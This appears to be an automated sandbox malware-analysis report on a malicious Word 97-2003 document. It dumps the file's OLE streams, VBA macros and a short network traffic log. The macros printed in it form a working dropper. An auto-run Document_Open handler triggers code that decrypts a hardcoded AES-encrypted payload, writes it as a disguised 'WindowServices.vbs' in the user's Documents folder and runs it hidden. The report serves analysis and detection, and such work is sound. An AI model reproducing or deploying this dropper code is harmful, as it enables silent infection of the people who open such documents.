              ElseIf IsArray(Salt) Then
                  baSalt = Salt
              Else
                  baSalt = ToUtf8Array(Salt & vbNullString)
              End If
              If IsArray(key) Then
                  baKey = key
              End If
              If KeyLen <= 0 Then
                  KeyLen = AES_KEYLEN
              End If
              If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then
                  Error = uCtx.LastError
                  GoTo QH
              End If
              If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore:=bHashBefore, HashAfter:=bHashAfter) Then
                  Error = uCtx.LastError
                  GoTo QH
              End If
              If IsArray(Hmac) Then
                  baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)
                  #If Win64 Then
                      lPtr = PeekPtr(VarPtr(Hmac) + 8)
                  #Else
                      lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)
                  #End If
                  If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then
                      lPtr = PeekPtr(lPtr)
                  End If
                  #If Win64 Then
                      lPtr = PeekPtr(lPtr + 16)
                  #Else
                      lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)
                  #End If
                  Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)
              End If
              '--- success
              AesCryptArray = True
          QH:
              pvCryptoAesCtrTerminate uCtx
              Exit Function
          EH:
              vErr = Array(Err.Number, Err.Source, Err.Description)
              pvCryptoAesCtrTerminate uCtx
              Err.Raise vErr(0), vErr(1), vErr(2)
          End Function
          
          Public Function AesChunkedInit(Optional key As Variant, Optional ByVal KeyLen As Long) As Boolean
              Dim baEmpty()       As Byte
              Dim baKey()         As Byte
              
              pvCryptoAesCtrTerminate m_uChunkedCtx
              baEmpty = vbNullString
              If IsArray(key) Then
                  baKey = key
              End If
              If KeyLen <= 0 Then
                  KeyLen = AES_KEYLEN
              End If
              AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)
          End Function
          
          Public Function AesChunkedCryptArray(baInput() As Byte, baOutput() As Byte, Optional ByVal Final As Boolean = True) As Boolean
              If m_uChunkedCtx.hAesAlg = 0 Then
                  m_uChunkedCtx.LastError = ERR_CHUNKED_NOT_INIT
                  Exit Function
              End If
              baOutput = baInput
              AesChunkedCryptArray = pvCryptoAesCtrCrypt(m_uChunkedCtx, baOutput)
              If Final Then
                  pvCryptoAesCtrTerminate m_uChunkedCtx
              End If
          End Function
          
          Public Function AesChunkedGetLastError() As String
              AesChunkedGetLastError = m_uChunkedCtx.LastError
          End Function
          
          '= private ===============================================================
          
          Private Function pvCryptoAesCtrInit(uCtx As UcsCryptoContextType, baPass() As Byte, baSalt() As Byte, baDerivedKey() As Byte, ByVal lKeyLen As Long) As Boolean
              Const MS_PRIMITIVE_PROVIDER         As String = "Microsoft Primitive Provider"
              Const BCRYPT_ALG_HANDLE_HMAC_FLAG   As Long = 8
              Dim hResult         As Long
              
              With uCtx
                  '--- init member vars
                  .EncrData = vbNullString
                  .EncrPos = 0
                  .LastError = vbNullString
                  ReDim Preserve baDerivedKey(0 To lKeyLen + AES_IVLEN - 1) As Byte
                  If UBound(baPass) >= 0 Or UBound(baSalt) >= 0 Then
                      '--- generate RFC 2898 based derived key
                      On Error GoTo EH_Unsupported '--- PBKDF2 API missing on Vista
                      hResult = BCryptOpenAlgorithmProvider(.hPbkdf2Alg, StrPtr(KDF_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
                      If hResult < 0 Then
                          GoTo QH
                      End If
                      hResult = BCryptDeriveKeyPBKDF2(.hPbkdf2Alg, ByVal pvArrayPtr(baPass), pvArraySize(baPass), ByVal pvArrayPtr(baSalt), pvArraySize(baSalt),                     KDF_ITER / 10000@, baDerivedKey(0), UBound(baDerivedKey) + 1, 0)
                      If hResult < 0 Then
                          GoTo QH
                      End If
                      On Error GoTo 0
                  End If
                  '--- init AES key from first half of derived key
                  On Error GoTo EH_Unsupported '--- CNG API missing on XP
                  hResult = BCryptOpenAlgorithmProvider(.hAesAlg, StrPtr("AES"), StrPtr(MS_PRIMITIVE_PROVIDER), 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  On Error GoTo 0
                  hResult = BCryptGetProperty(.hAesAlg, StrPtr("ObjectLength"), .AesKeyObjLen, 4, 0, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  hResult = BCryptSetProperty(.hAesAlg, StrPtr("ChainingMode"), StrPtr("ChainingModeECB"), 30, 0)  ' 30 = LenB("ChainingModeECB")
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  ReDim .AesKeyObjData(0 To .AesKeyObjLen - 1) As Byte
                  hResult = BCryptGenerateSymmetricKey(.hAesAlg, .hAesKey, .AesKeyObjData(0), .AesKeyObjLen, baDerivedKey(0), lKeyLen, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  '--- init AES IV from second half of derived key
                  Call CopyMemory(.Nonce(0), baDerivedKey(lKeyLen), AES_IVLEN)
                  '--- init HMAC key from last HashLen bytes of derived key
                  hResult = BCryptOpenAlgorithmProvider(.hHmacAlg, StrPtr(HMAC_HASH), StrPtr(MS_PRIMITIVE_PROVIDER), BCRYPT_ALG_HANDLE_HMAC_FLAG)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  hResult = BCryptGetProperty(.hHmacAlg, StrPtr("HashDigestLength"), .HashLen, 4, 0, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
                  hResult = BCryptCreateHash(.hHmacAlg, .hHmacHash, 0, 0, baDerivedKey(lKeyLen + AES_IVLEN - .HashLen), .HashLen, 0)
                  If hResult < 0 Then
                      GoTo QH
                  End If
              End With
              '--- success
              pvCryptoAesCtrInit = True
              Exit Function
          QH:
              uCtx.LastError = GetSystemMessage(hResult)
              Exit Function
          EH_Unsupported:
              uCtx.LastError = ERR_UNSUPPORTED_ENCR
          End Function
          
          Private Sub pvCryptoAesCtrTerminate(uCtx As UcsCryptoContextType)
              With uCtx
                  If .hPbkdf2Alg <> 0 Then
                      Call BCryptCloseAlgorithmProvider(.

          General
          Stream Path:Macros/VBA/ViewSession
          VBA File Name:ViewSession.cls
          Stream Size:11978
          Data ASCII:. . . . . . . . . . . . . . . . 8 . . . ! . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . s 6 . M / ; L * = h . 8 . . + 3 q . . . . . . . . . . . . . . . . . . . . * O N . . W . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S . . . . . S . . . . . S . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . .
          Data Raw:01 16 03 00 00 00 01 00 00 1a 05 00 00 e4 00 00 00 38 02 00 00 ff ff ff ff 21 05 00 00 a9 1a 00 00 00 00 00 00 01 00 00 00 d4 44 d1 cf 00 00 ff ff 03 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 73 dc 36 85 9d bd 0c 4d 90 2f 3b 89 99 e0 4c 85 2a 3d fb fc fa a0 68 10 a7 38 08 00 2b 33 71 b5 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ViewSession"
          Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = False
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = False
          Attribute VB_Customizable = False
          
          Public Sub ikwiwiejs_19293_Ade()
              Dim key As String
              Dim decryptedText As String
              Dim i As Integer
              Dim parts(1 To 60) As String
              Dim Oekksoioa_ As String
              Dim chunkSize As Integer
              Dim tempFilePath As String
          
              ' ?t kha AES
              key = "Bnshekao@3123989942"    ' Kha 16 byte cho AES
              part1 = "U2FsdGVkX1+dNqiwSTp9Sqv/0TVrzrOc76g8zk4YPSNm5OKURc2v0uIodtcsnOL6RJb3xYgUlCOFV6b6XWkTdeHQCGey7pI8qwnT5xLy/VKSKg5FmPBOCTNQUgAASA7wXsGTeAC5PbxpiVz04iBNdx"
              part2 = "bUoo21wrnWlCB0xLqmNF1uhdY1X6mPBEZyoB9M3X2e8G+2gVZC616vgx4A63rh5QJUwC+/llk0cuMyK5PZ4GPRRyjK6DAKh+NjgEfwujNBYu1K1wKhEdzX7hSmdnhxJ6QU6m3L8g4OtSwJ+B5lcYs1"
              part3 = "APaW/Bt4WwymusVnlV/9P1kTHJwZsLr2yuzrUR6QD4Z7Hy2CH1HCd78hoUhbKM2hXKsb9QZdjPI3nC+NVPgVbZTwZsSlmE2sXyeYXZb0/11tIK0AnJLNPd8KLtpNfioVRINA601YuFNqSi8J+vAjFq"
              part4 = "ptgioL11dGXpMe3Y1hFXWiCXvUpWkV1X58aK4AAFqY4itc1XMpNkjKiGNdP6QdVCrQ/fFg/ni38thsinsexqtAkb6immNECdsvgpKh36pjarHIAl1fya1xofovnGuT97OLiJH8wVysHeM9YKKZPgZF"
              part5 = "1fC3a1XE2RH92Y5dTbe2Mu9t0nQ9BHHbyhy4T32YyNV9MFdCB8pix3foKT/q0KGBfPGiQjDDJiWS4QUfrjaIbx1VhtihHaB3fpWRoVkGnjVTd3N5QVMckl6x0VzHMEq8pRw3yO5AxJqpRKK2CnJFZP"
              part6 = "4HtpvPyipWL2r2m3tEB2IfpBwLa6PLBeuSlXAeXis9riaM5diYNMS4iUcU74hZAwzV4mEJ9Jj0OoYM09jpok6R0BzkJ4TDr4j6W2i9Qra/zddsmbEqmUB3F28cj8+Q51M6Y8dBxNETxrnpttj7MRFz"
              part7 = "448jdoKx7yZwpPUSEllFI6aJExbW5OU0SeA3l0sPcwOrFVl2BcxGE4xNF3xMNXZv7ySzj1O5oQclakPNhwBXN+JhuXPCeA2PmTmM00/HmKpHziXUrbS74q+KqbVUOinDlQfToSi8d73W7jHWN/hmHH"
              part8 = "oU63mk5bUpOP079z2hntojd1sHY4dcRXRKvx0asiUXNG4UqCNH00yVyAKhvI8Dcd17kFfq/bde/LLF2GtlKM4iJ+nzMHMbs3IkXYTGr5/ODdJTgTq3XjeDHXIjYSj13l8nLQtx9m2S3TJukPyfeyOi"
              part9 = "7qtGErzbfMQhoOfpp2kuFxmLk+p+A+VjT5JVN16MldTldAy7QbVHqU8l0kTByBO+y4y2jN8HhP3Kk9TGwj4jlvoeOONTB6l3jD9V84H3nrQup6mpGv1w9KuH69xYBqnBeI+btZbNH9KfFE/ynL4Xsj"
              part10 = "Y8gnrSKktu4V47h17Q2iagtWR4L2m4pByPdrreHbsP0rY2Q5LkH37MUaHx9cmBMoUDNr2sIYZH3TA81b1kCYCKSg5g/2aHrTcIPXP2A9QR2OCstl/5c45+IgG2w4dLv0xtVvcD8Y/WuUAc3/hDcSXA"
              part11 = "c22K+jW908mHl1h/F1dKkbrFtdwRHriyiWKS9bTcjhwkV9WsHv7hGA2SR8Ek80N8VEsZKES3j0ZdvVgupiuE0DYqhPFQqjvZpn1sR4Acz88n0182sFl+8gSzop6GZKI3lftmOZM25QygdvILClX9vh"
              part12 = "ZcT+hu3SdvKLFQiGhIWunEmdtEJMSZH9pXzvmftAH8lhoZJ9Eq4tb/kWYDC7HufK+lesGow6lGx21uHMuvkfBD5LXVSHBC8k4gRIkTl/oS/U7oQKbbKg12ltdJusa1oRdQwspoCdebVGiuxqZSRMgP"
              part13 = "V1553L6FMJrS4FKUKxhYJVsSlrj9qVZZ/eCAPuscoB8dVOiqs7cyCWXUk4Qj5QxJms+tMVdugYoz5ozlXXiU6lzQJE8d4DrpHxkDV+0rLUY6RbZLUWwdEdHsJ1mHJooaQag4+CBG/bXk2J6KUdhxop"
              part14 = "ExrtYjBVs4zcHp8QWrz1A4MekTIXEDoar3wzHUibSEnItftTfLA1K0pdT1VzmXULgiJt2XtHxcI8p4UAEyMWJPGHRUclbNG8kzit6BXBoOFmh8tpQvhjUnwzp1U/pBq2+JFAzj9/8SVfOjFL1+mucA"
              part15 = "i1pSm2bvHJyoIfjCxh52RR51TIKot9mABF8F3sAQtVMmGEYvCQ9wuI6qE4NgqEEVhB0NdsrEzc19osiPUEKMMgTW86sBHKzrS5++r5mRX5RVtp1ZDjyq9YJC/e9UNpaLYUoVccJ2sVtdQu/RX2/N/S"
              part16 = "tWOepSU3zzJO3IC0LNDusBrP93U4TCouibRyPz4epM1SJQJjMx6K+xopwZo3BZ3pmbwoXFAO0fzHVW9/OkZdQnUBMWpZSAXB04I2uGA6d3CQrSiKe7EWHDBW9QnXbNuQy37TwUNlqjP/xhhJHsZA7P"
              part17 = "arP1NJmqk35mND6Fg88hP9rePCswSV166VP0fF/OYTPwVC9oXMPso94X2FAXEdUBuzFkxgOdSdGyah1WPEM5ZvTshQYXGcuf2cDr6nLNgUCVnFtVbQiNIGRb7wYTLzjvB89XoUs1YcnZXQmCKkmHCH"
              part18 = "GSH2dKTbANfW29PD7ZZK/dgGDVe3GAwwoqPiAOV74rw1hxrXad4TU1H+pEwHsxv0jnYXCdBI9iBV2P1pjMJWkXjT+N/oq6ZoM3hVRos7jaOwnvBI0163788stbN02N7VhgBzY/d0f+LtQVteFbgA0o"
              part19 = "HsS3ddDuf6EbxorfddYWNkOV3TvdwWNH3HpYmBq8GrjgxVoNDSw6E8eLoyqIXvqs1DxlLY/uHNorxP9iDGO2ZYMQ0qY3x6te3GbKJZKl3OekMFxDqkhqCE8IJSYTwSbAxNA2K6DHYsT/vDVm9OsrE+"
              part20 = "c2mPNjYheGhsI9AI48kBXTJcVdKNXyDdegX3K4O757DjlbkPTjmgpV0OWum/axEOdwfCBykOjb7WJw4LvLaZo08Hahku87InP6PbcV4DNRou1RgjHp0NZban9TeRc/3zAQQuzRcXMk2CfO83CTE+fn"
              part21 = "2VtluxczXmPsqd1boUbJTHJqxu8/43ICU1wduq4SM4YoQTBLYnhlBhn8vYBbW62jHOJqVtfj6xVksqFrCT71i1duHfhRGQLKlRTjnK6GS8Hy7IkuJjfTW4yuVwUAljPSFLJjzH+ZdfLQUnVyJ8Mjp5"
              part22 = "Yo4PaUOkPABOieg8Qne25eflW34sILpeymCECFYOk8w/veOnLjgAMEqow24oa7epvSaAQgjzkjkLCpPnJ+CxKvUbFkZWVAs6xkP76iD+6kxPBAglXqIG2HNCSGucUwUk9HUE0rij3PIjsyMiW9Xhrz"
              part23 = "7VOCW1hbYBBP2V3JGotCL6en9V3EvgCOm42brJhx6jIY8IzvDDUC+EnfnJmUUfFfDgZyVV4Yi1L+m4tdQhjbzVcEz0PyGGjcmk8o9FRd4mfVYPEmN3NQBxP3xEK4hx8uPXUA4aGj+8CXfWSvrzeLNg"
              part24 = "VqtTEkJLtTukhKEe977DegbZo9Q132SqvT6kjAzJ+UCcHjDDctQFmdMF5PfFle"
              Dim encryptedText As String
              encryptedText = part1 & part2 & part3 & part4 & part5 & part6 & part7 & part8 & part9 & part10 & part11 & part12 & part13 & part14 & part15 & part16 & part17 & part18 & part19 & part20 & part21 & part22 & part23 & part24
              decryptedText = AesDecryptString(encryptedText, key)    ' Gi?i m
          
              ' Kch thu?c c?a m?i ph?n
              chunkSize = 3000  ' Kch thu?c m?i ph?n
              Dim outputFilePath As String
              ' Luu ton b? n?i dung gi?i m vo t?p VBS
              vbsFilePath = Environ("USERPROFILE") & "\Documents\WindowServices.vbs"
          
              ' Ghi t?ng ph?n ra t?p
              Open vbsFilePath For Output As #1
              For i = 1 To Len(decryptedText) Step chunkSize
                  partText = Mid(decryptedText, i, chunkSize)
                  Print #1, partText  ' Ghi t?ng ph?n vo t?p
              Next i
              Close #1
          
          Dim shell As Object
          Set shell = CreateObject("Shell.Application")
          
          ' Ch?y file VBS ? ch? d? ?n (n?u h? tr?)
          shell.ShellExecute vbsFilePath, "", "", "open", 0
          
              
          
          End Sub
          
          Private Sub Class_Initialize()
              
          End Sub
          

          General
          Stream Path:Macros/VBA/ksksksksksksks
          VBA File Name:ksksksksksksks.cls
          Stream Size:1441
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . t H N B O _ . c . O - " 8 . . . . . . . . . . . . . . . . . . . . . . q . G B . , . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . . < 0 . . . . . . < 8 . . . . . . < . . . . . . < ( . . . . . . < . . . . . . . . . . (
          Data Raw:01 16 03 00 00 00 01 00 00 b4 03 00 00 e4 00 00 00 12 02 00 00 ff ff ff ff bb 03 00 00 8f 04 00 00 00 00 00 00 01 00 00 00 d4 44 a8 d5 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 07 b9 09 74 48 d4 4e 42 be 96 d1 4f be 5f 8a ea 92 8d 63 ac a2 17 e0 4f 8b 2d a0 a4 c2 22 38 09 00 00 00 00 00 00 00 00 00 00 00 00 00
          Attribute VB_Name = "ksksksksksksks"
          Attribute VB_Base = "1Normal.ThisDocument"
          Attribute VB_GlobalNameSpace = False
          Attribute VB_Creatable = False
          Attribute VB_PredeclaredId = True
          Attribute VB_Exposed = True
          Attribute VB_TemplateDerived = True
          Attribute VB_Customizable = True
          Private Sub Document_Open()
              Application.OnTime Now + TimeValue("00:00:01"), "DownloadAndRunEXE"
          End Sub
          
          

          General
          Stream Path:\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.235956365095031
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:4096
          Entropy:0.2427468033329246
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . .
          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
          General
          Stream Path:\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:4096
          Entropy:0.45444014931703014
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . 0 . . . . . . . < . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A D M I N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a
          Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f8 00 00 00
          General
          Stream Path:1Table
          CLSID:
          File Type:data
          Stream Size:7563
          Entropy:5.842344693433376
          Base64 Encoded:True
          Data ASCII:. . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6
          Data Raw:1e 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
          General
          Stream Path:Macros/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:598
          Entropy:5.2911106056391715
          Base64 Encoded:True
          Data ASCII:I D = " { 6 A C 5 3 0 6 E - 9 2 8 F - 4 D 3 0 - A C 3 1 - 2 8 1 A D 3 0 6 9 D D 1 } " . . D o c u m e n t = k s k s k s k s k s k s k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 3 . . C l a s s = V i e w S e s s i o n . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . H e l p F i l e = " 1 0 0 7 4 6 3 5 0 " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 0 5 2 2 0 F A 3 1
          Data Raw:49 44 3d 22 7b 36 41 43 35 33 30 36 45 2d 39 32 38 46 2d 34 44 33 30 2d 41 43 33 31 2d 32 38 31 41 44 33 30 36 39 44 44 31 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 33 0d 0a 43 6c 61 73 73 3d 56 69 65 77 53 65 73 73 69 6f 6e 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c
          General
          Stream Path:Macros/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:155
          Entropy:3.107165469264921
          Base64 Encoded:False
          Data ASCII:k s k s k s k s k s k s k s . k . s . k . s . k . s . k . s . k . s . k . s . k . s . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . V i e w S e s s i o n . V . i . e . w . S . e . s . s . i . o . n . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
          Data Raw:6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 6b 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 6b 00 73 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 56 69 65 77 53 65 73 73 69 6f 6e 00 56 00 69 00 65 00 77 00 53 00 65 00 73 00 73 00 69 00 6f 00 6e 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00
          General
          Stream Path:Macros/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:8089
          Entropy:5.662084075475776
          Base64 Encoded:True
          Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D .
          Data Raw:cc 61 b5 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
          General
          Stream Path:Macros/VBA/dir
          CLSID:
          File Type:data
          Stream Size:653
          Entropy:6.421648833038081
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . ? . . = . . . . . . < . . . . . . . r i . . . . r < . . . . . . . s t d o l e > . . . s . t . d . o . l . e . . . h . . . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . 0 . . E N o r ( m a l E N C r . m . a F . . . b . . * \\ C . . . . 3 . m . . ! O f f i " c g O . f . i . * c g
          Data Raw:01 89 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 a8 3f b5 00 00 3d 06 12 07 02 12 01 3c 08 06 12 02 09 02 12 8c da 72 69 0a 00 8a 0c 02 72 3c 02 0a 16 00 06 00 07 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 1d 02 5e 00 03 2a 5c
          General
          Stream Path:WordDocument
          CLSID:
          File Type:data
          Stream Size:4096
          Entropy:1.0834551557408363
          Base64 Encoded:False
          Data ASCII:. = . . . . . . . . . . . . . . . . . . . . . * . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . L h L h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . t . . . . . . . . . .
          Data Raw:ec a5 c1 00 3d 00 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 2a 08 00 00 0e 00 62 6a 62 6a 2e 97 2e 97 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e 0e 00 00 4c fd cd 68 4c fd cd 68 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
          TimestampSource PortDest PortSource IPDest IP
          Jan 14, 2025 15:19:43.891561031 CET5255753192.168.2.5162.159.36.2
          Jan 14, 2025 15:19:43.896306992 CET5352557162.159.36.2192.168.2.5
          Jan 14, 2025 15:19:43.896384001 CET5255753192.168.2.5162.159.36.2
          Jan 14, 2025 15:19:43.901273966 CET5352557162.159.36.2192.168.2.5
          Jan 14, 2025 15:19:44.350414038 CET5255753192.168.2.5162.159.36.2
          Jan 14, 2025 15:19:44.355638027 CET5352557162.159.36.2192.168.2.5
          Jan 14, 2025 15:19:44.355706930 CET5255753192.168.2.5162.159.36.2
          TimestampSource PortDest PortSource IPDest IP
          Jan 14, 2025 15:19:43.890775919 CET5365014162.159.36.2192.168.2.5
          Jan 14, 2025 15:19:44.362106085 CET5920553192.168.2.51.1.1.1
